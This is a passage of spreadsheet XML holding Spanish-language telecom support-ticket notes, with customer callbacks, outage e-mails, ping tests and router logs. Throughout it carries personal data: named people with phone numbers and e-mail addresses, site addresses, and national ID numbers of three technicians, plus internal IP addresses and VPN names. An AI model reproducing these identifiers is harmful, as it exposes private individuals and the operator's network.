**HORARIO DE ATENCION:8:00 A 16:00 HRS
GESTION DE PERMISOS: SOLO IDENTIFICADOS
DIRECCION: CALLE AMELIA UMASCOR BARRIO EN CENTRO CONCEPCION DE ORIENTE LA UNION
ATENDERA EN SITIO: NOHEMI BONILLA
**</t>
  </si>
  <si>
    <t>F4595710</t>
  </si>
  <si>
    <t>F4595717</t>
  </si>
  <si>
    <t>SE ENVIA CORREO CON LAS PRUEBAS DE ESTE ENLACE OPERATIVO, ESTIMADOS VALIDAR MEDIANTE SD, GRACIAS.
RE: SOLICITUD DE SOPORTE ::: ID LOCAL VARIOS ::: TICKET CNOC IMBBL004185::: "FUERA DE SERVICIO"</t>
  </si>
  <si>
    <t>F4595720</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  52 55 5174 5290 MENCIONA QUE SE PUEDE PROCEDER CON EL CIERRE
-ID 2001294927</t>
  </si>
  <si>
    <t>SE ENVIO CORREO A CLIENTE CON PRUEBAS
ASUNTO:  RE: SOLICITUD DE SOPORTE ::: ID LOCAL VARIOS ::: TICKET CNOC IMBBL004185::: "FUERA DE SERVICIO"
JURGEN RENE BOCH CAAL
BUENAS TARDES,
ESTIMADO CLIENTE POR ESTE MEDIO ADJUNTO PRUEBAS DE SERVICIO ACTIVO CON RESPECTO AL ENLACE CON ID: 70019OH  UBICADO EN 1CALLE,7 Y 8 AVENIDASO.2 DO PISO EDIFICIO GOLDBRAND LOCAL#10, SAN PEDROSULA, CORTES  HONDURAS.
PING -C 1500 -S 1500 -M 55 -B -VPN-INSTANCE VPN_BIMBO_LOCAL 10.1.240.134
  PING 10.1.240.134: 1500  DATA BYTES, PRESS CTRL_C TO BREAK
    !!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
  --- 10.1.240.134 PING STATISTICS ---
    1500 PACKET(S) TRANSMITTED
    1500 PACKET(S) RECEIVED
    0.00% PACKET LOSS
    ROUND-TRIP MIN/AVG/MAX = 1/1/8 MS
SALUDOS
.</t>
  </si>
  <si>
    <t>F4595724</t>
  </si>
  <si>
    <t>F4595725</t>
  </si>
  <si>
    <t>F4595731</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE AL 52 (55) 5174 5299 CONTESTAN PERO DEJAN EN ESPERA Y NO RETOMAN LLAMADA ||
SE INTENTARA LUEGO **
-ID 2001282986
**</t>
  </si>
  <si>
    <t>F4595735</t>
  </si>
  <si>
    <t>F4595741</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SR. CARLOS ISRAEL DÍAZ MACHUCA 22399702 ACTUALMENTE EN LLAMADA ...</t>
  </si>
  <si>
    <t>SE LLAMA A INFORMATICO DE TURNO 23464900 SE CORTO LA LLAMADA ...</t>
  </si>
  <si>
    <t>CLIENTE SR. CARLOS ISRAEL DÍAZ MACHUCA 22399702 SOLICITA REALIZAR PRUEBAS CON EL PUNTO REMOTO INFORMATICO DE TURNO, 23464900 23313147, ADICIONAL SE LE CONSULTA SOBRE LAS IP DE ORIGEN Y DESTINO, ID: 2001247298.
ORIGEN: 172.31.10.38
DESTINO: 172.16.18.1</t>
  </si>
  <si>
    <t>CLIENTE SR.  DARWIN 23313147 INFORMA QUE TODO ESTA BIEN CON EL ENLACE DE CLARO, PROPORCIONA LA IP 172.31.14.6 (MP120839003S) LA CUAL SI ES RUTEABLE, SE INTENTO AGREGAR AL AUDIO A SR. CARLOS DIAZ PERO NO CONTESTO, SR. DARWIN VALIDA ENLACE Y AUTORIZA EL CIERRE DEL INCIDENTE, EL LLAMARA A SR. CARLOS PARA INFORMAR QUE TODO ESTA BIEN.
&lt;LJUASVYNN1D1EID1&gt;DISP IP ROUTIN VPN-INSTANCE CAJADECREDITO 172.31.14.6
ROUTE FLAGS: R - RELAY, D - DOWNLOAD TO FIB, T - TO VPN-INSTANCE, B - BLACK HOLE ROUTE
------------------------------------------------------------------------------
ROUTING TABLE : CAJADECREDITO
SUMMARY COUNT : 1
DESTINATION/MASK    PROTO   PRE  COST        FLAGS NEXTHOP         INTERFACE
    172.31.14.0/24  IBGP    200  50            RD  10.179.30.35    50|100GE7/0/0
                    IBGP    200  50            RD  10.179.30.35    50|100GE8/0/0
ID: 2001250453, ID: 2001252074.
DESDE LA CENTRAL SE TINE CONEXION AL PUNTO REMOTO:
MP120839003S#PING 172.16.18.1  SOURCE GIGABITETHERNET 0/1
TYPE ESCAPE SEQUENCE TO ABORT.
SENDING 5, 100-BYTE ICMP ECHOS TO 172.16.18.1, TIMEOUT IS 2 SECONDS:
PACKET SENT WITH A SOURCE ADDRESS OF 10.130.79.154
!!!!!
SUCCESS RATE IS 100 PERCENT (5/5), ROUND-TRIP MIN/AVG/MAX = 1/2/4 MS
DESDE EL PUNTO REMOTO UP:
IP2087006#PING 172.31.14.253 SOURCE VLAN 1
TYPE ESCAPE SEQUENCE TO ABORT.
SENDING 5, 100-BYTE ICMP ECHOS TO 172.31.14.253, TIMEOUT IS 2 SECONDS:
PACKET SENT WITH A SOURCE ADDRESS OF 172.16.18.1
!!!!!
SUCCESS RATE IS 100 PERCENT (5/5), ROUND-TRIP MIN/AVG/MAX = 1/2/4 MS
A ESTA IP NO SE TIENE PING YA QUE ESTA BLOQUEADA POR SI FW:
IP2087006#PING 172.31.14.6 SOURCE VLAN 1
TYPE ESCAPE SEQUENCE TO ABORT.
SENDING 5, 100-BYTE ICMP ECHOS TO 172.31.14.6, TIMEOUT IS 2 SECONDS:
PACKET SENT WITH A SOURCE ADDRESS OF 172.16.18.1
.....
SUCCESS RATE IS 0 PERCENT (0/5)</t>
  </si>
  <si>
    <t>F4595746</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE VICTOR MEZA AL 2255-9595 CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
-ID 2001284665
**</t>
  </si>
  <si>
    <t>F4595765</t>
  </si>
  <si>
    <t>***--- CL VALIDA OPERATIVIDA Y CONSULTA EVENTOS DE NUESTRO LADO POR LO QUE SE RESPONDE CORREO INICANDO QUE NO SE OBSERVO EVENTO SEGÚN CRONOLOGIAS Y SE SOLICITA CIERRE --**
DE: EDUARDO LUIS PINEDA ZELEDA
ENVIADO EL: VIERNES, 10 DE JUNIO DE 2022 05:02
PARA: CARRILLO MONTERO JOSE ANGEL &lt;CMONTERJ@UNINET.COM.MX&gt;; PERLA MARINA ESTRADA PACAY &lt;PERLA.ESTRADA@CLARO.COM.GT&gt;
CC: CNOC INTERNACIONAL &lt;CNOC.INTL@UNINET.COM.MX&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; GERSON NICOLAS AJPACAJA PONCIO &lt;GERSON.AJPACAJA@CLARO.COM.GT&gt;; HERNANDEZ SUESCUM JOSE OSWALDO &lt;JHSUESCU@UNINET.COM.MX&gt;; ELDER JOSUE LOPEZ CHAVEZ &lt;ELDERJ.LOPEZ@CLARO.COM.GT&gt;
ASUNTO: RE: SOLICITUD DE SOPORTE ::: ID LOCAL CONTR0002471228OC::: TICKET CNOC IMQLT000012::: "FUERA DE SERVICIO "
ESTIMADO SR. CARRILLO.
                GRACIAS POR LA CONFIRMACIÓN, PERSONAL A CARGO NOS INDICA QUE NO SE OBSERVÓ ALGÚN EVENTO O AFECTACIÓN EN NUESTRA RED.
ES PROBABLE QUE SE PRESENTARA AFECTACIÓN DE ENERGÍA EN SITIO, PODRÍA INDICARNOS SI PODRÍAMOS CERRAR NUESTRO TICKET.
CUALQUIER CONSULTA QUEDAMOS A LA ORDEN.
SALUDOS.
DE: CARRILLO MONTERO JOSE ANGEL [MAILTO:CMONTERJ@UNINET.COM.MX]
ENVIADO EL: VIERNES, 10 DE JUNIO DE 2022 04:45
PARA: PERLA MARINA ESTRADA PACAY &lt;PERLA.ESTRADA@CLARO.COM.GT&gt;; EDUARDO LUIS PINEDA ZELEDA &lt;EDUARDO.PINEDA@CLARO.COM.GT&gt;
CC: CNOC INTERNACIONAL &lt;CNOC.INTL@UNINET.COM.MX&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; GERSON NICOLAS AJPACAJA PONCIO &lt;GERSON.AJPACAJA@CLARO.COM.GT&gt;; HERNANDEZ SUESCUM JOSE OSWALDO &lt;JHSUESCU@UNINET.COM.MX&gt;; ELDER JOSUE LOPEZ CHAVEZ &lt;ELDERJ.LOPEZ@CLARO.COM.GT&gt;
ASUNTO: RE: SOLICITUD DE SOPORTE ::: ID LOCAL CONTR0002471228OC::: TICKET CNOC IMQLT000012::: "FUERA DE SERVICIO "
BUEN DIA
VEMOS EL SERVICIO ACTIVO POR CASI 2 HORAS, NOS AYUDAN CON EL RFO.
QUEDAMOS AL PENDIENTE.
SALUDOS/BEST REGARDS</t>
  </si>
  <si>
    <t>***--- TELMEX INDICA QUE OBSERVAN CAIDO DE NUEVO EL SERVICIO --**
DE: CARRILLO MONTERO JOSE ANGEL [MAILTO:CMONTERJ@UNINET.COM.MX]
ENVIADO EL: VIERNES, 10 DE JUNIO DE 2022 03:01
PARA: GERSON NICOLAS AJPACAJA PONCIO &lt;GERSON.AJPACAJA@CLARO.COM.GT&gt;; ELDER JOSUE LOPEZ CHAVEZ &lt;ELDERJ.LOPEZ@CLARO.COM.GT&gt;; HERNANDEZ SUESCUM JOSE OSWALDO &lt;JHSUESCU@UNINET.COM.MX&gt;
CC: CNOC INTERNACIONAL &lt;CNOC.INTL@UNINET.COM.MX&gt;; TECNICORPO &lt;TECNICORPO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;
ASUNTO: RE: SOLICITUD DE SOPORTE ::: ID LOCAL CONTR0002471228OC::: TICKET CNOC IMQLT000012::: "FUERA DE SERVICIO "
BUEN DIA TEAM
NUEVAMENTE OBSERVAMOS EL SERVICIO CAÍDO. NOS AYUDAN A REVISAR.
QUEDAMOS AL PENDIENTE.
SALUDOS/BEST REGARDS</t>
  </si>
  <si>
    <t>F4595770</t>
  </si>
  <si>
    <t>SE VALIDAN PRUEBAS DE PRIMER NIVEL CON CLIENTE, PERO SERVICIO NO LEVANTA, SE PROCEDE A COORIDINAR VISITA
DIRECCION: YUSCARAN EL PARAISO, BARRIO EL CALVARIO, FABRICA LICORERA
HORARIO: 8:00 A  17:00 HORAS
PERMISOS: NO
CONTACTO EN SITIO: FERNANDO ESPINAL 99934791
NÚMERO: 22056099
FIN: HOY, 14:07
ID DE LLAMADA: 2001250025</t>
  </si>
  <si>
    <t>F4595818</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  LUIS POCON 41595538 PARA BRINDAR RETROALIMENTACION PERO NO RESPONDE
-ID 2001414284</t>
  </si>
  <si>
    <t>SE LLAMÓ A JOSÉ MANUEL CONTRERAS/BO CX 58260718 PARA SEGUIMIENTO, NO CONTESTA; DEBIDO A QUE NO SE HA TENIDO APOYO POR PARTE DE GESTIÓN N1 VÍA SKYPE; SE ESCALA CON KEVYN FONSECA/TEAM LEADER N1, INDICA QUE NOS APOYARÁ CON SEGUIMIENTO. LUIS POCON/CLIENTE ESTÁ CONSULTANDO EL FEEDBACK.</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  JIMMI TOJ 41485419 PARA BRINDAR RETROALIMENTACION
-ID 2001413457</t>
  </si>
  <si>
    <t>F4595822</t>
  </si>
  <si>
    <t>**SE LLAMA  A CLIENTE SUGEYLIN AL 00506 6035-7696 CONFIRMA SERVICIO ESTABLE Y OPERATIVO **
ID 2001296062
**</t>
  </si>
  <si>
    <t>F4595824</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MARIELA FLORES 87651808 PARA BRINDAR RETROALIMENTACION
-ID 2001415705</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MARIELA FLORES 87651808 NO RESPONDE, SE INTENTARA LUEGO
-ID 2001357183 - 2001357859 - 2001358188</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MARIELA FLORES  87651808 MENCIONA QUE PERSISTE EL INCONVENIENTE, SE NOTIFICARA PARA EL SEGUIMIENTO
-ID 2001278640</t>
  </si>
  <si>
    <t>ES NECESARIO REALIZAR PRUEBAS CON LOS EQUIPOS  EN EL PUNTO REMOTO</t>
  </si>
  <si>
    <t>F4595827</t>
  </si>
  <si>
    <t>SE ENVIA CORREO A CLIENTE, PARA QUE NOS APOYE CON LOS ACCESOS, EL DIA DE MAÑANA A LAS 10:00HRS
DE: CARLOS EDGARDO ICHEL ESCOBAR &lt;CARLOS.ICHEL@CLARO.COM.GT&gt;
ENVIADO: JUEVES, 9 DE JUNIO DE 2022 20:38
PARA: CRLAAMNOC MAILBOX &lt;CRLAAMNOC_MAILBOX@DXC.COM&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;; OCOX PIRIR, AXEL ANTONIO &lt;A.OCOXPIRIR@DXC.COM&gt;; ALEJANDRO NAVARRO FERNANDEZ &lt;ALEJANDRO.NAVARRO@CLARO.COM.GT&gt;; ELDER JOSUE LOPEZ CHAVEZ &lt;ELDERJ.LOPEZ@CLARO.COM.GT&gt;; CENTRAL.PROTECCION@MAYANHOLDING.COM &lt;CENTRAL.PROTECCION@MAYANHOLDING.COM&gt;
CC: CAMACHO SOTO, MARCO VINICIO &lt;M.CAMACHOSOTO@DXC.COM&gt;; MELENDEZ ALVAREZ, SOFIA &lt;S.MELENDEZALVAREZ@DXC.COM&gt;; GONZALEZ, JORGE ALEJANDRO &lt;J.GONZALEZ4@DXC.COM&gt;; PACHECO, JEAN CARLOS &lt;JEAN-CARLOS.PACHECO.PALACIOS@DXC.COM&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; BRENES, ESTEBAN &lt;E.BRENESCARBALLO@DXC.COM&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;
ASUNTO: RE: INC23583307 || PROBLEMAS DE CONEXIÓN DESDE POPTUN HACIA OFICINAS CENTRALES ABVO GUATEMALA || F4595827||
BUENAS NOCHES SOLICITAMOS DE SU APOYO COORDINANDO ACCESOS PARA EL DIA DE MAÑANA A LAS 10:00HRS
UBICACIÓN: 16.337222 -89.420556 POPTUN PETEN (25 MTS) ---- 9 AVE 0-70 ZONA4 BARRIO EL PORVENIR POPTUN PETEN
CONTACTIO EN SITIO: MARVIN QUISAR/PR 3278 6073
AL SIGUIENTE PERSONAL
ERICK HERNANDEZ        DPI 1771463891401
ANTONIO CASTAÑEDA  DPI 3053763810206
DAVID GONZALEZ          DPI 1782722990901</t>
  </si>
  <si>
    <t>F4595832</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE KEVIN VADO 59239092 MENCIONA QUE ESTARA REALIZANDO PRUEBAS POR LO QUE SOLICITA LLAMDAA A LAS 16:15
-ID 2001282247</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  KEVIN VADO 59239092 QUIEN SOLICITA LAS IP ESTATICA, SE CONSULTA CON GESTOR Y SE BRINDA LA INFORMACION
CLIENTE CONFIRMA Y MENCIONA QUE SI VOLVIERA A PRESENTAR ALGUN PROBLEMA SE ESTARA CONTACTANDO POR MEDIO DE CC
-ID 2001289950 - 2001290087 - 2001293460</t>
  </si>
  <si>
    <t>F4595840</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE CARLOS HERNANDEZ 23386328  MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 2001283371</t>
  </si>
  <si>
    <t>F4595860</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE PR 37608342 MENCIONA QUE TODO ESTA FUNCIONANDO CORRECTAMENTE
-ID 2001285530</t>
  </si>
  <si>
    <t>F4595861</t>
  </si>
  <si>
    <t>SE ESTÁ CONSULTANDO AVANCES DEL TICKET A GESTIÓN N1 VÍA SKYPE Y SE LE ENVÍA LA INFORMACIÓN DADO POR ÁREA COMERCIAL VÍA SKYPE.</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE LUIS CABEZAS LEON AL 50683183070 NO RESPONDE Y SE LLAMA AL SEÑOR JOSE LUIS AL  83183070 PERO TAMPOCO SE LOGRA COMUNICACION **
ID 2001445036 - 2001445158 - 200145669 - 2001446021
**</t>
  </si>
  <si>
    <t>**SE LLAMA A ANDRES CASTIN AL NUMERO 50687197129  NO RESPONDE SE INTENTARA LUEGO **
-ID 2001444812
**</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE 83183070 NO RESPONDE, ENVIA DIRECTO A BUZON
-ID 2001401105</t>
  </si>
  <si>
    <t>F4595890</t>
  </si>
  <si>
    <t>SE ENVIO CORREO A CLIENTE
DE: JUAN RODRIGUEZ CRISTOBAL &lt;JUANR.RODRIGUEZ@CLARO.COM.GT&gt;ENVIADO: JUEVES, 9 DE JUNIO DE 2022 15:02PARA: SERVICIOS 5B &lt;SERVICIOS5B@TYT.COM.GT&gt;; MONITOREOFALLASATM@5B.COM.GT &lt;MONITOREOFALLASATM@5B.COM.GT&gt;CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;ASUNTO: ENLACE ALARMADO PARA CLIENTE "CC_TYT_GT_ATM014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5890
ID: 47500993T
IDENTIFICADOR DEL CLIENTE:  CC_TYT_GT_ATM0142
UBICADO EN:  ATM 42- KM.17.5 CARR. AL PACIFICO C.COM. SANTA CLARA, KIOSKO 116, VILLA NUEVA
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>F4595895</t>
  </si>
  <si>
    <t>SE LLAMA AL PR AL 50140306 ID 2001380558 PARA VALIDAR EL FUNCIONAMIENTO Y ATIENDE  BRENDA FLORES  Y COMENTA QUE NO PRESENTAN AFECTACIÓN Y COMENTA EL INCONVENIENTE ES CON UN SERVICIO MEDIANTE UN RAUTER QUE BRINDA WI-FI  PERO QUE COMENTAN QUE AYER LE ENVIARON UN CORREO SOBRE EL TICKET QUE TIENE QUE NO ES EL ACTUAL QUE FUE CERRADO POR TAL RAZON NO HAY NADA PENDIENTE POR PARTE DEL CLIENTE Y AL VALIDAR QUE TODO ESTA OPERATIVO SE SOLICITA AL GESTOR GERSON.AJPACAJA VIA SKYPE EL CIERRE DE LA FALLA PENDIENTE CERRA EL TICKET CON LA SD</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE JOSE FUENTES 23386801 EXT.: 32320 NO RESPONDE, SE INTENTARA LUEGO
-ID 2001312415</t>
  </si>
  <si>
    <t>F4595898</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE SAMUEL SAQUIC 41506491 QUIEN APOYA REINICIANDO EL EQUIPO PERO EL SERVICIO NO RESTABLECE
-ID 2001299938
NOMBRE DEL CLIENTE: PROYECTOS TURISTICOS MAYA, S.A.
UBICACIÓN:9 CALLE PONIENTE CARR A CIUDAD VIEJA ANTIGUA GUATEMALA
CONTACTO EN SITIO: SAMUEL SAQUIC - 41506491
HORARIO DE ATENCION:8:00 - 17:00 HRS (VISITA PARA MAÑANA A PARTIR DE LAS 8)
GESTIÓN DE PERMISOS: UNICAMENTE IDENTIFICADOS</t>
  </si>
  <si>
    <t>F4595904</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE ABNER RODRIGUEZ QUIEN INDICA QUE NO POSEEN LLAMADAS SALIENTES.
2001273574
COLA:
NOMBRE: A: 51278297
NÚMERO: 51278297
DURACIÓN: 0:00:30
ESTADO: CONECTADA
DETALLES: 51278297
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 9/06/2022 15:22:31</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE OSWIN MARTINEZ 45876222 MENCIONA QUE REINICIARON LOS EQUIPOS PERO EL INCONVENIENTE PERSISTE, SE DEJA EN CONFERENCIA CON GESTOR
-ID 2001316111</t>
  </si>
  <si>
    <t>-* SE HABLA OSWIN MARTINEZ (CLIENTE) INFORMA QUE NO HAN PODIDO REINICIAR LA PBX POR QUE ESTAN EN PRODUCCION, COMENTA QUE LA REINICIARAN A LAS 18:00 HRS, SOLICITA SE LE LLAME A DICHA HORA -*
-*</t>
  </si>
  <si>
    <t>SE RECIBE LLAMADA DEL TEC. PEDRO TOT QUIEN INDICA QUE YA SE ENCUENTRA DONDE EL CLIENTE.
EL CLIENTE INDICA QUE VA DE CAMINIO HACIA LAS INSTALACIONES.
2001323410
COLA:
NOMBRE: CONFERENCIA
NÚMERO: 4895
DURACIÓN: 0:01:07
ESTADO: CONECTADA
DETALLES: 4895
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 9/06/2022 19:15:55</t>
  </si>
  <si>
    <t>SE LLAMO AL CLIENTE ABNER QUIEN INDICA QUE AUN NO HA REINCIADO LA PBX. SOLICITA QUE SE LE LLAME EN 1HRS NUEVAMENTE.
2001291558
COLA:
NOMBRE: A: 51278297
NÚMERO: 51278297
DURACIÓN: 0:01:19
ESTADO: DESCONECTADO [DESCONEXIÓN LOCAL]
DETALLES: 51278297
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JOSE.SOTO
FECHA Y HORA LOCALES: 9/06/2022 16:22:05</t>
  </si>
  <si>
    <t>F4595923</t>
  </si>
  <si>
    <t>SE HABLA CON ENCARGADO DE PUNTO REMOTO HECTO AL  32860288, COMENTA QUE NO PUEDE VALIDAR SI ES POR ENERGIA LA CAIDA DEL ENLACE YA QUE ESTA LLOVIENDO FUERTE POR LO CUAL SOLICITA SE LE LLAME EL DIA DE MAÑANA.
2001274018
COLA:
NOMBRE: A: 32860288
NÚMERO: 32860288
DURACIÓN: 0:01:49
ESTADO: DESCONECTADO [COLGADO LOCALMENTE]
DETALLES: 32860288
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: JUANR.RODRIGUEZ
FECHA Y HORA LOCALES: 9/06/2022 15:24:42</t>
  </si>
  <si>
    <t>F4595926</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE BEATRIZ ABARCA AL 72357405 SOLICITA QUE SE LE LLAME A LAS 9:00 AM YA QUE NO HA LLEGADO A LA OFICINA **
ID 2001789348
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE BEATRIZ ABARCA AL 72357405 NO RESPONDE | ENVIA A BUZON SE INTENTARA LUEGO**
ID 2001813201
**</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE BEATRIZ ABARCA AL 72357405 CONTESTA E INDICA QUE SIGUE EL INCONVENIENTE INDICA QUE NO PUEDE INGRESAR A LA PAGINA CONSTITUCIONAL QUE TIENEN Y QUE TIENE QUE ESTAR CAMBIANDO DE IP CUANDO TIENE MUCHO TRAFICO DE CORREOS  INDICA QUE LA OTRA VEZ SE SOLUCIONO CON CAMBIO DE POOL QUE LE REALIZARON || SE NOTIFICA A GESTOR E INDICA QUE CL TIENE QUE HABLAR CON HOSTING O QUE SE COMUNIQUE CON SU EJECUTIVO CL MOLESTA INDICA QUE SIEMPRE LE HECHAMOS LA CULPA AL HOSTIN || SE NOTIFICA A GESTOR  **
ID 2001869196
**</t>
  </si>
  <si>
    <t>F4595928</t>
  </si>
  <si>
    <t>SE  LLAMA A CLIENTE WALTHER LEMUS 61868348 MENCINA QUE HAN PRESENTADO VARIOS APAGONES DE ENERGIA ELECTRICA Y NO CUENTAN CON UPS
CLIENTE MENCIONA QUE EL SERVICIO ES MUY INESTABLE
-ID 2001313458</t>
  </si>
  <si>
    <t>CLIENTE INDICA QUE EN ESTE MOMENTO NO CUETAN CON SERVICIO PERO A NIVEL DE CLARO RESPONDE OK- INDICA QUE ENVIARA FOTOGRAFIAS DE LOS EQUIPOS QUE OBSERVA POR ALGUN MOTIVO CAIDO--
ATE TO UP
*JUN 10 10:26:08.837 GMT: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE FASTETHERNET2, CHANGED STATE TO UP
*JUN 10 10:44:43.922 GMT: %IP-4-DUPADDR: DUPLICATE ADDRESS 192.168.1.1 ON VLAN1, SOURCED BY 3854.9B1A.C0A0
*JUN 10 10:48:12.696 GMT: %IP-4-DUPADDR: DUPLICATE ADDRESS 192.168.1.1 ON VLAN1, SOURCED BY 3854.9B1A.C0A0
*JUN 10 10:50:43.295 GMT: %IP-4-DUPADDR: DUPLICATE ADDRESS 192.168.1.1 ON VLAN1, SOURCED BY 3854.9B1A.C0A0
*JUN 10 10:53:46.081 GMT: %IP-4-DUPADDR: DUPLICATE ADDRESS 192.168.1.1 ON VLAN1, SOURCED BY 3854.9B1A.C0A0
*JUN 10 10:55:41.800 GMT: %IP-4-DUPADDR: DUPLICATE ADDRESS 192.168.1.1 ON VLAN1, SOURCED BY 3854.9B1A.C0A0
*JUN 10 10:57:39.843 GMT: %IP-4-DUPADDR: DUPLICATE ADDRESS 192.168.1.1 ON VLAN1, SOURCED BY 3854.9B1A.C0A0
*JUN 10 11:08:43.816 GMT: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE FASTETHERNET2, CHANGED STATE TO DOWN
*JUN 10 11:08:44.828 GMT: %LINK-3-UPDOWN: INTERFACE FASTETHERNET2, CHANGED STATE TO UP
*JUN 10 11:08:45.836 GMT: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE FASTETHERNET2, CHANGED STATE TO UP
*JUN 10 11:08:51.956 GMT: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE FASTETHERNET2, CHANGED STATE TO DOWN
*JUN 10 11:08:52.968 GMT: %LINK-3-UPDOWN: INTERFACE FASTETHERNET2, CHANGED STATE TO UP
*JUN 10 11:08:53.968 GMT: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE FASTETHERNET2, CHANGED STATE TO UP
*JUN 10 11:11:06.319 GMT: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE FASTETHERNET2, CHANGED STATE TO DOWN
*JUN 10 11:11:07.331 GMT: %LINK-3-UPDOWN: INTERFACE FASTETHERNET2, CHANGED STATE TO DOWN
*JUN 10 11:11:10.471 GMT: %LINK-3-UPDOWN: INTERFACE FASTETHERNET2, CHANGED STATE TO UP
*JUN 10 11:11:11.471 GMT: %LINEPROTO-5-UPDOWN: LINE PROTOCOL ON INTERFACE FASTETHERNET2, CHANGED STATE TO UP
